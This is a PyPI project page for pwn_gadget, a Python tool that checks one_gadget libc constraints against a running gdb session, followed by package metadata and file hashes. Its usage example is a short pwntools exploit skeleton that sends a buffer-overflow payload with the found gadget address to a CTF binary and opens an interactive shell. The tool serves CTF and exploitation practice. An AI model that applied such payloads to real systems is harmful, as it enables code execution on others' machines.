Find satisfiable one gadgets from a running gdb instance

Navigation

Verified details

These details have been verified by PyPI
Maintainers
Avatar for zolutal from gravatar.com zolutal

Unverified details

These details have not been verified by PyPI
Project links
Meta
  • Requires: Python >=3.8
Classifiers

Project description

pwn_gadget

Check for satisfied one gadget constraints using the state of a running gdb instance

Required to have the one_gadget tool installed and in your path, it is called via subprocess to gather the gadgets/constraints

How does this work?

pwn_gadget parses the constraints generated by one_gadget in python into a format that can be evaluated by a gdb print command.

Leveraging the Gdb python api, accessed through pwntools' gdb module, it executes those commands parsed from the one_gadget constraints.

Performs all of the boolean operations in the one_gadget constraints on the results from the commands run in gdb.

Searches for a gadget where every boolean operation returned True, returning either that offset or None.

Regardless of if a satisfiable gadget is found or not, color coded information on the succeeding and failing constraints for each gadget will be printed.

Usage

from pwn import *
import pwn_gadget

p = process("chal")
libc = p.libc

# attach and break at the target address
_, gdb_api = gdb.attach(p, gdbscript="b *(vuln+180)", api=True)
# call pwn_gadget function to look for satisfied gadgets
gadget = pwn_gadget.find_gadget(gdb_api, libc.path)

# use found address in payload
payload = b"A"*32 + p64(gadget+libc.address)
p.sendline(payload)

p.interactive()

Example Output

Success

Successful discovery of satisfied one gadget

Failure

Failed discovery of satisfied one gadget

Project details

Verified details

These details have been verified by PyPI
Maintainers
Avatar for zolutal from gravatar.com zolutal

Unverified details

These details have not been verified by PyPI
Project links
Meta
  • Requires: Python >=3.8
Classifiers

Release history Release notifications | RSS feed

0.0.2

This version

0.0.1

Download files

Download the file for your platform. If you're not sure which to choose, learn more about installing packages.

Source Distribution

pwn_gadget-0.0.1.tar.gz (4.5 kB view details)

Uploaded Source

Built Distribution

pwn_gadget-0.0.1-py3-none-any.whl (5.6 kB view details)

Uploaded Python 3

File details

Details for the file pwn_gadget-0.0.1.tar.gz.

File metadata

  • Download URL: pwn_gadget-0.0.1.tar.gz
  • Upload date:
  • Size: 4.5 kB
  • Tags: Source
  • Uploaded using Trusted Publishing? No
  • Uploaded via: twine/4.0.1 CPython/3.10.4

File hashes

Hashes for pwn_gadget-0.0.1.tar.gz
Algorithm Hash digest
SHA256 42a80aba9f2e773c1d6860708d812c9f3bdc636c5d3a6878b53c9cb9a5a4afc4
MD5 c24ce0780edb3ca573d10176daa76e16
BLAKE2b-256 9555ff0310a3079a3d1dc7f62521f1b8080f56392842e05e5989c213f7c2e3c6

See more details on using hashes here.

Provenance

File details

Details for the file pwn_gadget-0.0.1-py3-none-any.whl.

File metadata

  • Download URL: pwn_gadget-0.0.1-py3-none-any.whl
  • Upload date:
  • Size: 5.6 kB
  • Tags: Python 3
  • Uploaded using Trusted Publishing? No
  • Uploaded via: twine/4.0.1 CPython/3.10.4

File hashes

Hashes for pwn_gadget-0.0.1-py3-none-any.whl
Algorithm Hash digest
SHA256 f00794c55878edc93e8052391a0dec93f63b4d6cf7ef015fc938007d805600ee
MD5 545fc144bb1225b8f9abdce73f5b2216
BLAKE2b-256 ce5a160b1d3b57daeada69712b7c337217c2423dfcbe9f28bde2d04fa21bf33c

See more details on using hashes here.

Provenance

Supported by

AWS AWS Cloud computing and Security Sponsor Datadog Datadog Monitoring Fastly Fastly CDN Google Google Download Analytics Microsoft Microsoft PSF Sponsor Pingdom Pingdom Monitoring Sentry Sentry Error logging StatusPage StatusPage Status page